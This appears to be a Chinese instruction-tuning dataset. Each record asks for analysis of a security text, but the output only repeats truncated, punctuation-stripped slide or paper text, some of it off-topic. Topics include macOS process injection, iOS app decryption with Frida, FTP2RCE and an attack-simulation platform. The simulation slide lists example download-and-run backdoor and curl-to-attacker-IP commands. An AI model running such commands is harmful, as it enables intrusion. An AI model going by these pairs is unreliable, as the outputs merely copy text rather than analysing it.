{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 论文日读Enabling Efficient Cyber Threat Hunting With Cyber Threat Intelligence ## 概要 论文Gao, Peng, Fei Shao, Xiaoyuan Liu, Xusheng Xiao, Zheng Qin, Fengyuan Xu, Prateek Mittal, Sanjeev R. Kulkarni和Dawn Song. Enabling Efficient Cyber Threat Hunting With Cyber Threat Intelligence. *ArXiv:2010.13637 [Cs]*, 25/2/2021. http://arxiv.org/abs/2010.13637. 该论文主要提出一种基于NLP和搜索查询技术的威胁狩猎框架主要包含以下几个部分 - 轻量级NLP管道 - TBQL一种特定领域查询语言DSL - 一查询合成机制自动合成TBQL查询语句 - 一个高效的查询执行引擎适用于大规模日志数据 <img src=\"https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20220102105217457.png\" alt=\"image-20220102105217457\" style=\"zoom:50%;\" /> 图框架组成 ## 笔记 ### 当前困境和挑战 在本文中作者认为当前的威胁狩猎仍是需要大量人工参与的劳动密集型工作也相对容易出错另一方面基于IOC指标的防御方案较容易被绕过但从非结构化数据中能获取更多威胁相关信息 在该项工作中作者主要目标是在非结构化的开源网络威胁情报OSCTI报告中提取威胁行为IOC及其关系以及用提取的知识帮助威胁狩猎的过程因此主要的挑战是 - 在自然语言为主的OSCTI报告中较难精确提取威胁信息例如IOC中的特殊字符会混淆大部分NLP模块 - 威胁狩猎是一个需要从海量数据中大海捞针的过程因此对大数据的存储和查询机制也有更高的要求 ### 框架 针对以上问题作者提出以下基于开源威胁情报进行威胁狩猎的平台架构图 ![image-20220102111907790](https://image-host-toky.oss-cn-shanghai.aliyuncs.com/image-20220102111907790.png) 图ThreatRaptor框架图 - Part1: 用于威胁行为提取的无监督轻量级和准确的NLP 管道 - 为了处理细微差别并满足及时威胁搜寻的要求该管道采用了一系列技术例如IOC 保护基于依赖关系解析的IOC关系提取来实现准确高效的威胁行为提取 - 提取的威胁行为用结构化的**威胁行为图**表示其中节点表示IOC边表示IOC关系与非结构化的 OSCTI 文本相比这种结构化的威胁行为表示更适合自动化处理和集成 - Part2: 特定领域查询语言TBQL和查询合成机制 - 为了便于对海量的系统审计日志数据进行狩猎该框架拥有一个高效的查询子系统该子系统采用威胁行为查询语言 (TBQL) 查询存储在数据库后端的日志数据TBQL 是一种声明性语言它集成了计算机系统中用于威胁狩猎的关键原语集合 - Part3: 查询合成机制 - 为了将威胁行为图与查询子系统连接起来该框架采用了一种查询合成机制可以从构建的图形中自动合成 TBQL 查询通过这种方式可以将有关威胁行为的外部知识自动集成到威胁搜寻中同时该框架也支持查询编辑的人工编辑进行分析 - TBQL和查询和查询合成机制主要考虑到威胁狩猎是一个迭代过程涉及多轮查询编辑和执行 - Part4: 高效查询执行引擎 - 为了高效查询大数据该框架对数据存储和查询执行引擎进行了专门的优化 - 具体来说THREATRAPTOR 采用数据缩减技术Data Reduction Techniques来合并过多的系统事件同时保留足够的信息为了执行 TBQL 查询该框架将其分解为多个部分并将每个部分编译为语义等效的数据查询在PostgreSQL或Neo4j数据库中执行的小型 SQL或 Cypher查询 - 然后该框架使用*调度算法*根据它们估计的修剪能力和语义依赖性来调度这些数据查询的执行该做法的好处是能避免SQL和Cypher查询语句的连接和编织导致查询性能下降并利用查询语义来加快执行速度另外除了这种精确搜索模式之外该框架通过扩展支持基于不精确图模式匹配的模糊搜索模式 ### 示例场景 以下是一个针对数据泄漏攻击场景下进行威胁狩猎的完整流水线过程 ![image-20220102112339154](https://image-host-toky.oss-cn-shanghai.ali", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n>> >> Process injection Breaking All macOS Security Layers With a Single Vulnerability >> Hello! Im Security researcher at Computest Thijs Alkemade >Thijs Alkemade (@xnyhps) >Security researcher at Computest >Computest research lab: Sector 7 >Other recent work includes: - 0click Zoom RCE at Pwn2Own Vancouver 2021 - Winning Pwn2Own Miami 2022 with 5 ICS vulnerabilities About me 1. macOS security model 2. CVE-2021-30873: process injection using saved states 3. Using process injection for: - Sandbox escape - Privilege escalation - SIP bypass In this talk macOS security model In macOS 12 Monterey >Users are security boundaries, processes are not >File permissions: POSIX flags >Attach debugger: target must run as same user >root has full access Old *NIX security model >Dangerous operations now require the application to have an entitlement - Loading a kernel extension - Modifying system files - Debugging system processes >More and more restrictions in each macOS release - Debugging any app is now restricted - Data vaults with restricted file access SIP restrictions >Process A executing code as process B >Many techniques are restricted by SIP >Hardened runtime prevents it in apps: - No DYLD_* environment variables - Library validation >But macOS is old, and large Process injection >Common in third-party app >Abuse TCC permissions: access webcam, microphone, etc. >Downgrade attacks often work >Whats better than process injection in one app? Process injection everywhere! Process injection CVE-2021-30873 Process injection in AppKit >Re-opening the windows of an app when relaunched >Restores unsaved documents >Works automatically, can be extended by developers Saved state feature >Stored in: - ~/Library/Saved Application State/<ID>.savedState >windows.plist - array of all windows, each with an encryption key >data.data - custom format, AES-CBC encrypted serialized object per record Saved state storage >Insecure deserialization can lead to RCE - Well known in C#, Java, Python,", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n软件安全分论坛 自我介绍  ID仙果  清华大学网络行为研究所   安全研究员  兴华永恒北京    高级安全工程师  7年安全工作经验专注于漏洞分析漏洞防护  浏览器  用户接入互联网的门户   2015年8月份全球主流浏览器市场份额排行榜  浏览器漏洞攻防的参与者  时间线  *~2008 2009-2010 2011-2012 2013-2014 2015 Win 7 NO_ASLR&堆填充 ActiveX Java Flash Plyaer象混淆 CVE-2011-2110 IE器UAF CVE-2013-2551 CVE-2014-0322 HackingTeam yuange_vbscript, Flash Player CVE-2010-3654 CVE-2009-1492 CVE-2010-3971 CVE-2012-0779 浏览器防护手段  DEP 杀毒软件防护 EMP 隔离堆 栈Cookies ASLR SEHOP EAF 沙盒 IE6/7-REALPLAYER  RealPlayer  10.0/10.5/11  ierpplug.dll  ActiveX  Control  Import  Playlist  Name  Stack  Buffer  Overflow  Vulnerability   CVE-2009-1537-QuickTime  Movie  Parser  Filter  in  quartz.dll  in  DirectShow  艺术的原始积累   ---       野蛮生长   XP系统的脆弱性得到极大的放大  野蛮  暴力  WIN7的抗争-CVE-2010-3971  袁哥大法好  ASLR的陷落-CVE-2010-3654  3654漏洞的黑历史&浏览器漏洞攻防新篇章    的开启  DEMO  漏洞攻防---相爱相杀  去掉JAVA虚拟机SecurityManager属性=可以干任何事  2011-2013:JAVA漏洞大行其道  袁哥天书之不弹不闪不卡  CVE-2012-0779-加密技术大爆发  登堂入室的艺术  CVE-2014-0322:IE+FLASH组合  CVE-2013-2551-LEAK_ADDRESS  江湖一招鲜-CVE-2014-6332  System:   Win95-Win10  Browser:  ie3~ie11  数组越界访问  全浏览器&全系统&防护全绕过  Hacking  Team  :Flash  0day&Font  0day  X32/X64 IE/FireFox/Chr ome Windows/Mac OS/Linux DEP EPM&CF G ASLR CFG 超 级 炸 弹 IE已死有事烧纸  浏览器的重生  谢谢大家&QA", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nandroid appios iosios iphone6 12.4.5 12.4.5CheckRa1n CheckRa1n --CheckRa1n Welcome to checkra1nstart next start 1.start 2.sidehome 3.sidehome checkra1n cydia frida python3 python3.7 frida cydiafrida https://build.frida.re cydia--- cydiafridafrida,iOSfrida frida for pre-A12iPhone6sA9 pip install frida pip install frida-tools pip install objection frida frida ~  frida --version 14.2.13 ~  frida-ls-devices tea@teadeMBP Id Type Name ---------------------------------------- ------ ------------ local local Local System 4443c74f7b644116cdc90386281868199f45a13a usb iPhone socket remote Local Socket -------- iosappFairPlayDRM frida-io-dump usbmuxd usbmuxd http://cgit.sukimashita.com/usbmuxd.git/snapshot/usbmuxd-1.0.8.tar.gz usb python-client  frida-ps -U tea@teadeMBP PID Name ---- -------------------------------------------------------- 925 Cydia 2495 ScreenshotServicesService 236 checkra1n 2426 2472 253 151 AGXCompilerService 126 AGXCompilerService 74 AppleCredentialManagerDaemon 170 AssetCacheLocatorS ~  frida-ps -Ua tea@teadeMBP PID Name Identifier ---- --------- ----------------------- 925 Cydia com.saurik.Cydia 236 checkra1n kjc.loader 2426 com.alipay.iphoneclient 2472 com.apple.Preferences 253 com.apple.mobilemail frida-ios-dump git clone https://github.com/AloneMonkey/frida-ios-dump.git cd frida-ios-dump sudo pip install -r requirements.txt --upgrade xcode xcodeappstorexcode https://developer.apple.com/download/more/?=xcode xcode xcodeappstorexcode- macos Catalina 10.15.6xcode11.7 Xcode_11.7.xip xcodeApplications 1. 20G 2. xattr -d com.apple.quarantine Xcode_11.7.xip 3. cd python-client macios tcprelay.py -t iOS:mac python tcprelay.py -t 22:2222 ssh root@localhost -p 2222 alpine NameIdentifier cd frida-ios-dump python dump.py Aftenposten frida-ios-dump http://dantheman827.github.io/ios-app-signer/ github:https://github.com/DanTheMan827/ios-app-signer http://dantheman827.github.io/ios-app-signer/ xcode idid General-Deployment Info idGeneral-Identityid Input File Signin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"ROLLBACK\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME ROLLBACK \\- 退出当前事务 .SH SYNOPSIS .sp .nf ROLLBACK [ WORK | TRANSACTION ] .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBROLLBACK\\fR 回卷当前事务并取消当前事务中的所有更新 .SH \"PARAMETERS 参数\" .TP \\fBWORK\\fR .TP \\fBTRANSACTION\\fR 可选的键字没有作用 .SH \"NOTES 注意\" .PP 使用 COMMIT [\\fBcommit\\fR(7)] 语句将一次事务成功停止 .PP 如果不在一个事务内部发出 ROLLBACK 不会有问题但是将抛出一个警告信息 .SH \"EXAMPLES 例子\" .PP 取消所有更改 .sp .nf ROLLBACK; .sp .fi .SH \"COMPATIBILITY 兼容性\" .PP SQL 标准只声明了两种形式 ROLLBACK 和 ROLLBACK WORK否则完全兼容 .SH \"SEE ALSO 参见\" BEGIN [\\fBbegin\\fR(7)], COMMIT [\\fBcommit\\fR(l)] .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n源代码安全测试云平台服务商 Secure Your Code Trust Your Software www.haodahengye.com.cn 18910080395 Fortify SCA 支持 Android 源码安全漏洞检测类别 1. Access Control: Android Provider 2. Access Control: Database 3. Android Bad Practices: Missing Broadcaster Permission 4. Android Bad Practices: Missing Receiver Permission 5. Android Bad Practices: Sticky Broadcast 6. Cross Site Scripting: Persistent 7. Cross Site Scripting: Poor Validation 8. Cross Site Scripting: Reflected 9. Header Manipulation: Cookies 10. Insecure Storage: Android External Storage 11. Log Forging 12. Password Management 13. Password Management: Empty Password 14. Password Management: Hardcoded Password 15. Password Management: Null Password 16. Password Management: Weak Cryptography 17. Path Manipulation 18. Privacy Violation 19. Privilege Management: Android Location 20. Privilege Management: Android Messaging 21. Privilege Management: Android Telephony 22. Privilege Management: Missing API Permission 23. Privilege Management: Missing Intent Permission 24. Query String Injection: Android Provider 25. Resource Injection 26. SQL Injection 27. System Information Leak 源代码安全测试云平台服务商 Secure Your Code Trust Your Software www.haodahengye.com.cn 18910080395 HP Fortify SCA 支持 iPhone 源码安全漏洞检测类别 1. Access Control: Database 2. Code Correctness: Regular Expressions Denial of Service 3. Format String 4. Key Management: Hardcoded Encryption Key 5. Log Forging 6. Memory Leak 7. Often Misused: Encoding 8. Often Misused: File System 9. Often Misused: SMS 10. Often Misused: Weak SSL Certificate 11. Password Management: Empty Password 12. Password Management: Hardcoded Password 13. Password Management: Null Password 14. Path Manipulation 15. Privacy Violation 16. Privacy Violation: Keyboard Caching 17. Privacy Violation: Screen Caching 18. Resource Injection 19. SQL Injection 20. Unreleased Resource: Streams 21. Unsafe Mobile Code: Insecure Transport 22. Unsafe Reflection 23. Weak Cryptographic Hash 24. Weak Encryption 25. Weak Encryption: Ins", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n由于之前在某篇文章看到但是当时懒没有测试顺便复现一下好像之前有搞过但是忘了emmmm.... 环境: 监听器: 初始机192.168.1.106上线 执行rportfwd指令 psexec上线 他这里的external指向的是192.168.1.108 Evernote Export file:///C:/Users/JiuShi/Desktop/cs反向端口转发上线.html 第1页 共1页 2020/7/17 18:43", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDEFCON16 Virtually Hacking 08 August 2008 2 Why VMware?  Virtualisation has taken off and is here to stay  Many of our clients are using virtualisation technologies  Virtualisation services are being sold  VMware is the dominant product*  Need to be familiar with a product in order to hack it *source  silicon.com 3 Structure  VMware  Different flavours  Key concepts  Hacking VMware Server + Demo  Hacking VMware ESX + Demo  dradis  putting it all together  Recommendations  Am I going to get owned? 4 Structure  VMware  Different flavours  Key concepts  Hacking VMware Server + Demo  Hacking VMware ESX + Demo  dradis  putting it all together  Recommendations  Am I going to get owned? 5 Different Flavours  Player  Workstation  Server (GSX)  ESX 6 Different Flavours  Player  Workstation  Server (GSX)  ESX 7 Key concepts Server Guest OS  One server can run multiple operating systems 8 Key concepts Hardware OS VMware Server Virtual Machines Apps OS Apps OS Apps OS VMware Server 9 Key concepts Hardware VMware ESX Virtual Machines Apps OS Apps OS Apps OS VMware ESX 10 Key concepts  Primary configuration file (.vmx)  Virtual disk file  the virtual machines hard drive (.vmdk)  Virtual machines snapshot (.vmsn)  Virtual machines page file (.vmem) Overview of the main files which make up a virtual machine 11 Key concepts  Virtual machine disk file can be mounted  Files can therefore easily be read from the disk  Demo... 12 Structure  VMware  Different flavours  Key concepts  Hacking VMware Server + Demo  Hacking VMware ESX + Demo  dradis  putting it all together  Recommendations  Am I going to get owned? 13 VMware:Server 14 VMware:Server Interesting ports on 192.168.1.53: Not shown: 1707 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 113/tcp open auth 389/tcp open ldap 902/tcp open issrealsecuresensor vmwareauthd 15 VMware:Server 16 VMware:Server  Tools  List VM's  Get state  Start/Stop  Get config  Get remote connections  Se", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAnton Bo0oM Lopanitsyn FTP2RCE FTP - Active mode Command channel Data channel Port 21 Clients port Clients port PORT 95,213,200,115,31,144 31*256+144 95.213.200.115 127.0.0.1:8080, OK What about redis? https://medium.com/@knownsec404team/rce-exploits-of-redis-based-on-master-slave-replication-ef7a664ce1d0 https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf FTP - Passive mode Command channel Data channel Port 21 Random port Random port A simple example of vulnerable code 1. PHP establishes an FTP connection $contents = file_get_contents($f); 2. FakeFTP gives a port with a payload for passive mode 3. Receiving a payload from socket and save to $contents 4. PHP comes to the FTP again. FakeFTP says ok, let's save your file using passive mode file_put_contents($f, $contents); 5. As a socket for passive mode puts the internal FastCGI port. The payload makes RCE Into the Wild CVE-2021-3129 https://www.ambionics.io/blog/laravel-debug-rce https://github.com/tarunkant/Gopherus https://github.com/dfyz/ctf-writeups/tree/master/hxp-2020/resonator ?  https://twitter.com/i_bo0om  https://t.me/webpwn", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n什么是入侵攻击模拟  要解决的问题  存在的挑战  入侵攻击模拟演练  机制简介  突破入口模拟  防御水位衡量  模拟演练机制简介  检测/响应水位衡量  其他业务场景落地  企业采用多种安全措施每一种都可能因 配置错误/运营问题失效且难以察觉  如仅依靠蓝军或外采渗透测试案例数量 较少时间上不连续可能遗漏成本高  安全水位无法量化建设效果难以衡量  从攻击者视角对企业基础设施进行持续的自动化安全测试  针对安全措施失效蓝军成本高的问题  定义模型量化当前安全水位发现问题反哺防御检测能力  ->解决无法量化的问题  2017年Gartner将入侵攻击模拟技术(BAS)列为威胁对抗Hype Cycle 中的新类别  如何对入侵攻击场景进行威胁建模并分级  如何持续尽量真实地测试并避免稳定性问题  防御检测水位如何量化评估  什么是入侵攻击模拟  要解决的问题  存在的挑战  入侵攻击模拟演练  机制简介  突破入口模拟  防御水位衡量  模拟演练机制简介  检测/响应水位衡量  其他业务场景落地 杀伤链模型 攻击行为模拟 -->衡量检测响应水位 突破入口模拟 -->衡量防御水位 寻找突破入口 实施恶意行为 阻止攻击 检测响应修复 利用成功前后 攻防重点不同 攻击方 防守方 模拟演练方 脚本小子 专业蓝军 国家顶尖 技术水平一般 主要利用现成 工具资源少 技术水平较高 自行编写工具 资源较多 技术水平高 可能使用0day 资源丰富  什么是入侵攻击模拟  要解决的问题  存在的挑战  入侵攻击模拟演练  机制简介  突破入口模拟  防御水位衡量  模拟演练机制简介  检测/响应水位衡量  其他业务场景落地 录入测试 插件 原子能力 测试 随机拨测 回归测试 枚举入侵 威胁 防御措施 ? 拦截 未拦 防御措施 防御措施 变更 攻击1 攻击2 攻击3  攻击1 攻击2 攻击3  优化防御策略 目标入口 攻击向量 绕过手法 恶意行为 Web通用组件-Jenkins (脚本语言为Groovy) 远程命令执行漏洞 CVE-2018-1000861 编码-十六进制编码 (Groovy原生支持hex和base64) 连接恶意网站-curl 120.26.xx.xx:23333 curl 120.26.xx.xx:23333的十六进制 编码 目标入口 Target of Attack/ Vulnerable Point 攻击向量 Attack Vector/ Vulnerability 绕过手法 Bypass/Escape/ Encoding 恶意行为 Shellcode/Command/ Malicious Outcome Web服务及组件 其他服务 自研服务/组件 通用服务/组件 注入 服务端请求伪造(SSRF) 不安全的反序列化 访问控制存在问题  X X X 编码 语法语义 架构/性能 数据渗出 后门植入/持久化 权限提升 凭证窃取 自研服务/组件 通用服务/组件   什么是入侵攻击模拟  要解决的问题  存在的挑战  入侵攻击模拟演练  机制简介  突破入口模拟  防御水位衡量  模拟演练机制简介  检测/响应水位衡量  其他业务场景落地 目标入口 攻击向量 攻击类型 绕过手法 恶意行为 POC 测试时间 拦截 情况 目标1 向量1 类型1 绕过1 行为1  时间1  目标2 向量2 类型2 绕过2 行为2  时间2  目标3 向量3 类型3 绕过3 行为3  时间3          测试结果汇总 攻击类型 拦截数/ 攻击数 未拦截 详情 命令执行 /  SQL注入 /     总计 /  原子能力衡量 目标入口 拦截数/攻 击数 分析 目标1 0/100 未接入防御措施 目标2 36/100 防御措施不足    随机拨测 回归测试 测试 样例 测试时间 (变更前) 拦截 测试时间 (变更后) 拦截 分析 攻击1     正常 攻击2     变更导致 防御失效       总计  100  88 需回滚  什么是入侵攻击模拟  要解决的问题  存在的挑战  入侵攻击模拟演练  机制简介  突破入口模拟  防御水位衡量  模拟演练机制简介  检测/响应水位衡量  其他业务场景落地 演练剧本 编排 攻击指令 执行 反入侵团 队介入 演练报告 生成 l 随机化剧本生成 Ø 机器数 Ø 应用范围 Ø 攻击阶段 Ø  攻击路径生成 Ø后门植入 Ø命令与控制 Ø持久化 Ø数据窃取 Ø 攻击手法分配 输入参数 Ø后门植入 Ø命令与控制 Ø持久化 Ø数据窃取 Ø HOW 1. wget http://hacker.com/backdoor 2. chmod +x backdoor 3. ./backdoor 4.  攻击手法序列 攻击命令序列 l", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# ELK问题踩坑 ## ES脑裂 ### 脑裂可能的原因 * 网络问题集群间的网络延迟导致一些节点访问不到master认为master挂掉了从而选举出新的master并对master上的分片和副本标红分配新的主分片 * 节点负载主节点的角色既为master又为data访问量较大时可能会导致ES停止响应造成大面积延迟此时其他节点得不到主节点的响应认为主节点挂掉了会重新选取主节点 * 内存回收data节点上的ES进程占用的内存较大引发JVM的大规模内存回收造成ES进程失去响应 ### 解决脑裂 * 减少误判discovery.zen.ping_timeout节点状态的响应时间默认为3s可以适当调大如果master在该响应时间的范围内没有做出响应应答会判断该节点已经挂掉了调整参数为6sdiscovery.zen.ping_timeout:6可适当减少误判 * 选举触发discovery.zen.minimum_master_nodes:1当备选主节点的个数大于等于该参数的值且备选主节点中有该参数个节点认为主节点挂了进行选举官方建议为(N/2)+1N为主节点个数即有资格成为主节点的节点个数 * 角色分离即master节点与data节点分离限制角色 ``` # 主节点 node.master: true node.data: false # 从节点 node.master: false node.data: true ``` ## 参考资料 [ES脑裂问题分析及优化](https://blog.csdn.net/kakaluoteyy/article/details/81068387)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBusiness logic flaws in mobile operators services B o g d a n A l e c u Bogdan ALECU About me Independent security researcher Sysadmin Passionate about security, specially when its related to mobile devices; started with NetMonitor (thanks Cosconor), continued with VoIP and finally GSM networks / mobile phones @msecnet / www.m-sec.net Bogdan ALECU GOALS o SIM Toolkit: what is it, how can we exploit it o Understanding of business logic flaws in mobile operators services o What you should do in order to protect from these attacks Bogdan ALECU TOPICS 1. SIM TOOLKIT 2. HTTP HEADERS 3. DATA TRAFFIC VULNERABILITY 4. THE EXTRA DIGIT 5. SUMMARY Bogdan ALECU THE BUGGY WORLD SIM 1 TOOLKIT Bogdan ALECU THE BUGGY WORLD SIM TOOLKIT 1 Example of SIM Toolkit icon on your mobile device Bogdan ALECU THE BUGGY WORLD For sending Ringtones, operator logo, concatenated messages, SMS makes use of the User Data Header SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD SIM TOOLKIT 1 ETSI TS 101 181 V8.9.0 Bogdan ALECU THE BUGGY WORLD The type of message sent is addressed directly to the SIM, by setting the PID to 0x7F, corresponding to USIM Data Download and by setting DCS to F6 SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD  then the ME shall pass the message transparently to the SIM  shall not display the message, or alert the user of a short message waiting   SIM TOOLKIT 1 ETSI GSM 11.14 Bogdan ALECU THE BUGGY WORLD SIM TOOLKIT 1 Security Parameter Indicator Security Parameter Indicator Security Parameter Indicator Security Parameter Indicator Bogdan ALECU THE BUGGY WORLD SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD UDH (User Data Header): 027000 PID (Protocol ID): 7F DCS (Data Coding Scheme): F6 000e0d00210000b20000aabbccddee00 CPL CHL SPI SPI 0 0 1 0 0 0 0 1 KIc KID TAR CNTR SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD  SIM card automatically replies to the sending number  Nothing in Inbox, Outbox  only on your bill SIM 1TOOLKIT Bogdan ALECU THE BUGGY WORLD LETS ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nGame of Chromes: Owning the Web with Zombie Chrome Extensions Abstract 2 Malicious Extensions Analysis 3 Malicious Extension I - Bot distribution through Facebook and Wix.com 3 Malicious Extension II - Bot distribution through Facebook and Google Drive 6 Vulnerable Extensions Analysis 8 Vulnerable Extension I - Adobe Acrobat 8 Vulnerable Extension II - AVG Web TuneUp 10 Vulnerable Extension III - JSONView 14 Abstract On April 16 2016, an army of bots stormed upon Wix servers, creating new accounts and publishing shady websites in mass. The attack was carried by a malicious Chrome extension, installed on tens of thousands of devices, sending HTTP requests simultaneously. This Extension Bot has used Wix websites platform and Facebook messaging service, to distribute itself among users. Two months later, same attackers strike again. This time they used infectious notifications, popping up on Facebook and leading to a malicious Windows-runnable JSE file. Upon clicking, the file ran and installed a Chrome extension on the victims browser. Then the extension used Facebook messaging once again to pass itself on to more victims. Analyzing these attacks, we were amazed by the highly elusive nature of these bots, especially when it comes to bypassing web-based bot-detection systems. This shouldnt be surprising, since legit browser extensions are supposed to send Facebook messages, create Wix websites, or in fact perform any action on behalf of the user. On the other hand, smuggling a malicious extension into Google Web Store and distributing it among victims efficiently, like these attackers did, is lets say - not a stroll in the park. But dont worry, there are other options. Recently, several popular Chrome extensions were found to be vulnerable to XSS. Yep, the same old XSS every rookie finds in so many web applications. So browser extensions suffer from it too, and sadly, in their case it can be much deadlier than in regular websites. One noticeable example is the Adobe Ac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Psychology of Computer Insecurity Peter Gutmann University of Auckland Why cant users get security right? Users are idiots  Developers build security applications  Users apply them incorrectly  Users are idiots  QED Why cant users get security right? OK, so users are irrational Definition: Rational  How geeks wish that users would behave Definition : Irrational   ( How geeks wish that users would behave ) Users are irrational simply because they dont behave in the manner arbitrarily tagged rational thats defined as How users should be using my software, dammit!  This type of rational behaviour does sometimes exist in people with psychiatric disorders  (Later slides will go into this in more detail) Why cant users get security right? (ctd) The field of psychology provides a great deal of insight into how people deal with security, but this resource is rarely used The heavenly laws of logic and probability rule the realm of sound reasoning: psychology is assumed to be irrelevant. Only if mistakes are made are psychologists called in to explain how wrong-wired human minds deviate from these laws [] Many textbooks present first the laws of logic and probability as the standard by which to measure human thinking, then data about how people actually think. The discrepancy between the two makes people appear to be irrational  Gerd Gigerenzer, Adaptive Thinking: Rationality in the Real World How Users Make Decisions Economic decision-making model (Bayesian decision- making-model) is based on standard economic thinking  Goes back to (at least) John von Neumanns work on game theory in the 1940s Assumes that people always know what they want and will choose the optimal course for getting it [This model] took its marching orders from standard American economics, which assumes that people always know what they want and choose the optimal course of action for getting it  Baruch Fischhoff, Decision making in complex systems How Users Make Decisions (ctd) The formalisation of t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBuilding Absurd Christmas Light Shows Computer Controlled Lights <Video of light show> Basic Elements of a Light Show  LEDs  Power Supplies  Waterproof cases  Cabling  Pixel Controllers  Sequencing Software  Show Controller + Software  FM Transmitter +Zip Ties. Lots and lots of zip ties Traditional Mini-Lights LEDs used here  3 LEDS on 1 chip Creating Colors Red, Green, Blue LEDS combine to make colors Additive Color Additive Colors Smart RGB at the core of the display What makes them smart? Pixels: WS-2812b serial protocol  Simple protocol  Indefinite length strings*  Reshapes pulses at each pixel Many form factors for LEDs Customize: cut and solder Custom Elements Mega Trees  Matrix made of Pixel Strings  Pictures, Animations, Effects  Low resolution  Example: 50x32 pixels, 14 feet tall  Dominate the scenery Mega Tree Flood Lights  Round out the display  10-30 Watts  Color Wash Walls & Trees  Streaming-ACN (E.131) Protocol  ACN- Industry standard suite of protocols for lighting and control via Ethernet  Subset for \"lightweight\" devices called sACN (E1.31)  UDP: Unicast to a single IP or Multicast  Groups up to 512 channels in Universes Ethernet Control of Pixels  Ethernet to pixels  Power and Fusing  Remapping  Testing Pixels  Good controllers have web based interfaces Controller Running the show  Dedicated computer  Starts lights on schedule  Streams data to controllers  Two popular options:  Windows PC  FPP Falcon Player- Raspberry PI Sequencing  Light show events aligned to music  Millisecond control of lights  Apply effects across one or more elements  Computing complex visual patterns  Simulates the show without hardware  Free and commercial sequences can be adapted Raspberry Pi Pixel Driver  Software library- Generate pixel serial data  GPIO pin 18  direct drive  3.3V data output  WS-2811/2812 pixels expect 5v  Works, but suboptimal Raspberry Pi Pixel Driver Better than direct drive:  Buffered outputs  12V and 5V pixel options  Two strings of 800+ pixels  Bo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBackdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek) @UnaPibaGeek WHO AM I?_ Sheila A. Berta (@UnaPibaGeek) Offensive Security Researcher @UnaPibaGeek WHO AM I?_ Sheila A. Berta (@UnaPibaGeek) Offensive Security Researcher A little bit more: - Developer in ASM (Microcontrollers & Microprocessors x86/x64), C/C++, Python and Go. - Speaker at Black Hat (x2), DEF CON (x2), Ekoparty (x4), HITB, PhDays, IEEE & more. @UnaPibaGeek @UnaPibaGeek @UnaPibaGeek MICROCONTROLLERS VS MICROPROCESSORS_ Microprocessors Intel, AMD, ARM  Microcontrollers Microchip, ATMEL, ST  @UnaPibaGeek MICROPROCESSORS OVERVIEW_  Microprocessors = CPU  Memories and I/O busses are physically separated.  Usually bigger than a microcontroller.  Greater processing capacity.  Modified-Harvard memory organization.  32 or 64 bits (most common). @UnaPibaGeek MICROCONTROLLERS OVERVIEW_  Microcontrollers = CPU + RAM + ROM + I/O busses  Smaller CPU with less processing capacity.  Usually smaller size than microprocessors.  Harvard memory organization.  16 bits (most common).  A little stack. @UnaPibaGeek USE CASES_ != Raspberry PI ARM Microprocessor Arduino UNO Atmega Microcontroller @UnaPibaGeek MICROCONTROLLERS EVOLUTION_ @UnaPibaGeek MICROCONTROLLERS EVOLUTION_ @UnaPibaGeek MICROCONTROLLERS EVOLUTION_ @UnaPibaGeek MICROCONTROLLERS EVOLUTION_ @UnaPibaGeek IS WORTH IT?_  Physical Security Systems.  Cars ECU.  Semaphores.  Elevators.  Sensors.  Modules of Industrial systems.  Home appliances.  Robots.   @UnaPibaGeek MICROCONTROLLERS PROGRAMMING_ @UnaPibaGeek MICROCONTROLLERS PROGRAMMING_ @UnaPibaGeek MICROCONTROLLERS PROGRAMMING_ ASM code to turning on a LED - (PIC) @UnaPibaGeek MICROCONTROLLERS PROGRAMMING_ ASM code to turning on a LED - (PIC) MPLAB X IDE @UnaPibaGeek MICROCONTROLLERS PROGRAMMING_ ASM code to turning on a LED - (PIC) MPLAB X IDE .hex file (firmware) @UnaPibaGeek 